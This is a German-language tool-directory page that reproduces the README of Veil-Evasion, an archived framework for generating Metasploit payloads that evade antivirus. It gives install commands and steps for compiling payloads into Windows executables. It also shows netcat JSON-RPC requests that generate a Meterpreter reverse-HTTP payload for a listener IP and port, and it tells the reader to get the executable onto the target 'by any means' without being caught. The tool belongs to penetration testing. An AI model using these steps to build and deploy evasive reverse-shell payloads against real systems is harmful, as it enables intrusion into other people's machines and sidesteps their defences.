Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/veil-framework/veil-evasion
Exploit-FrameworksPayload-GenerierungPenetrationstestsCommand and ControlShellcode-GenerierungArchived
GitHubveil-framework/veil-evasion

Veil-Evasion

Veil Evasion wird nicht mehr unterstützt, verwenden Sie Veil 3.0!

Repository anzeigen
1.8k6757vor 4 JahrenVon Kitploit geprüft
Webseite

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Veil-Evasion

Veil-Evasion ist ein Tool, das dazu entwickelt wurde, Metasploit-Payloads zu generieren, die gängige Antivirenlösungen umgehen.

HINWEIS: ./setup/setup.sh sollte bei jedem größeren Versionsupdate erneut ausgeführt werden. Wenn beim Ausführen von Veil-Evasion schwerwiegende Fehler auftreten, versuchen Sie zunächst, dieses Skript erneut auszuführen, um zusätzliche Pakete zu installieren und die gemeinsame Konfigurationsdatei zu aktualisieren.

Veil-Evasion wird derzeit aktiv von @ChrisTruncer, @TheMightyShiv, @HarmJ0y unterstützt.

Dank an:

  • @jasonjfrank
  • @mjmaley
  • @davidpmcguire

Software-Anforderungen:

Linux

  1. Verwenden Sie Kali (x86) und alle Abhängigkeiten sind vorinstalliert

oder

  1. Installieren Sie Python 2.7
  2. Installieren Sie PyCrypto >= 2.3

Windows (für Py2Exe-Kompilierung)

  1. Python (getestet mit x86 - http://www.python.org/download/releases/2.7/)
  2. Py2Exe (http://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/)
  3. PyCrypto ()
http://www.voidspace.org.uk/python/modules.shtml
  • PyWin32 (http://sourceforge.net/projects/pywin32/files/pywin32/Build%20218/pywin32-218.win32-py2.7.exe/download)
  • Einrichtung (tl;dr)

    HINWEIS: Die Installation muss mit Superuser-Rechten durchgeführt werden. Wenn Sie kein Kali Linux verwenden, stellen Sie jedem Befehl sudo voran oder wechseln Sie vor Beginn zum Root-Benutzer.

    Führen Sie setup.sh -c auf Kali x86 aus.

    Installieren Sie Python 2.7, Py2Exe, PyCrypto und PyWin32 auf einem Windows-Computer (für Py2Exe).

    Schnellinstallation

    root@kitploit:~
    apt-get -y install git
    git clone https://github.com/Veil-Framework/Veil-Evasion.git
    cd Veil-Evasion/
    cd setup
    setup.sh -c
    

    Konfiguration neu generieren

    HINWEIS: Dies muss mit Superuser-Rechten durchgeführt werden. Wenn Sie kein Kali Linux verwenden, stellen Sie jedem Befehl sudo voran oder wechseln Sie vor Beginn zum Root-Benutzer.

    Meistens muss die Konfigurationsdatei unter /etc/veil/settings.py nicht neu erstellt werden, aber in einigen Fällen werden Sie möglicherweise dazu aufgefordert. Die Datei wird von config/update.py generiert.

    Es ist wichtig, dass Sie sich vor dem Ausführen von update.py im Verzeichnis config/ befinden. Wenn nicht, wird settings.py fehlerhaft sein und beim Start von Veil-Evasion sehen Sie Folgendes.

    root@kitploit:~
        Main Menu
    
                0 payloads loaded
    

    Keine Panik. Wechseln Sie in das Verzeichnis config/ und führen Sie update.py erneut aus.

    Beschreibung

    Veil-Evasion wurde für den Betrieb unter Kali Linux entwickelt, sollte aber auf jedem System funktionieren, das Python-Skripte ausführen kann. Rufen Sie Veil-Evasion einfach über die Befehlszeile auf und folgen Sie dem Menü, um eine Payload zu generieren. Nach der Erstellung der Payload fragt Veil-Evasion, ob die Payload-Datei mit Pyinstaller oder Py2Exe in eine ausführbare Datei konvertiert werden soll.

    Bei Verwendung von Pyinstaller konvertiert Veil-Evasion Ihre Payload innerhalb von Kali in eine ausführbare Datei.

    Bei Verwendung von Py2Exe erstellt Veil-Evasion drei Dateien:

    • payload.py - Die Payload-Datei
    • setup.py - Erforderliche Datei für Py2Exe
    • runme.bat - Batch-Skript zur Kompilierung der Payload in eine Windows-ausführbare Datei

    Verschieben Sie alle drei Dateien auf Ihren Windows-Rechner mit installiertem Python. Alle drei Dateien sollten im Stammverzeichnis des Verzeichnisses abgelegt werden, in das Python installiert wurde (wahrscheinlich C:\Python27). Führen Sie das Batch-Skript aus, um das Python-Skript in ein ausführbares Format zu konvertieren.

    Platzieren Sie die ausführbare Datei mit allen notwendigen Mitteln auf dem Zielrechner und lassen Sie sich nicht erwischen!

    RPC-Server

    Auf der Listener-Seite führen Sie aus:

    ./Veil-Evasion --rpc

    Dadurch wird ein Listener auf Port 4242 gestartet.

    Auf der Client-Seite müssen Sie ein Client-Programm ausführen. Dies kann ein benutzerdefiniertes Skript sein oder so einfach wie Netcat. Der RPC-Server implementiert JSON-RPC. Dies ist eine gute Referenz zum Interpretieren von Anfragen und Antworten für JSON-RPC: http://json-rpc.org/wiki/specification

    Das RPC-Anfrageformat ist wie folgt:

    root@kitploit:~
        method="version"            -   gibt die aktuelle Veil-Evasion-Versionsnummer zurück
        method="payloads"           -   gibt alle derzeit geladenen Payloads zurück
        method="payload_options"
            params="payload_name"   -   gibt die Optionen für die angegebene Payload zurück
        method="generate"
            params=["payload=X",   
                    "outputbase=Y"
                    "overwrite=Z",
                    "msfvenom=...",
                    "LHOST=blah]     -   generiert die angegebene Payload mit den gegebenen Optionen und gibt den Pfad der generierten ausführbaren Datei zurück
    

    Dies ist ein einfaches Beispiel für die Arbeit mit Veil-Evasion mit Netcat:

    root@kitploit:~
    root@kali:~# nc 127.0.0.1 4242
    {"method":"version","params":[],"id":0}
    

    Und die Serverantwort:

    root@kitploit:~
    {"id":0,"result":"2.21.4","error":null}
    
    

    Ein Beispiel für ein Client-Programm finden Sie hier: http://github.com/miligulmohar/python-symmetric-jsonrpc/blob/master/examples/client.py

    HINWEIS: Der Port für Veil-Evasion ist 4242. Dieser muss in client.py geändert werden, damit es funktioniert.

    Um eine Payload zu generieren, müssen ALLE Parameter angegeben werden:

    • payload - welche Payload generiert werden soll
    • outputbase - der Name, unter dem die Payload gespeichert werden soll
    • LHOST - die IP-Adresse des lauschenden Hosts
    • LPORT - der Port des lauschenden Hosts
    • pwnstaller - True, um Python-Programme in eine ausführbare Datei zu packen. False, wenn nicht. Bei anderen Payloads ignoriert

    Dies ist eine gute Referenz, um zu verstehen, ob pwnstaller verwendet wird oder nicht: http://www.verisgroup.com/blog/2014/05/07/pwnstaller-and-the-veil-framework/

    Ein Beispiel für die Generierung einer Payload:

    root@kitploit:~
    root@kali:~# nc 127.0.0.1 4242
    {"method":"generate","params":["payload=c/meterpreter/rev_http","outputbase=payloadName","LHOST=192.168.1.11","LPORT=2121","pwnstaller=False"],"id":1"}
    

    Und die Serverantwort:

    root@kitploit:~
    {"id":8,"result":"/usr/share/veil-output/compiled/payloadName.exe","error":null}
    

    HINWEIS: Wenn in der Anfrage keine ID angegeben ist, fährt Veil-Evasion herunter. Sie können jedoch so viele gültige Anfragen stellen, wie Sie möchten, bis Veil-Evasion herunterfährt.

    Um den RPC-Server herunterzufahren, führen Sie aus:

    ./Veil-Evasion --rpcshutdown

    Tool herunterladen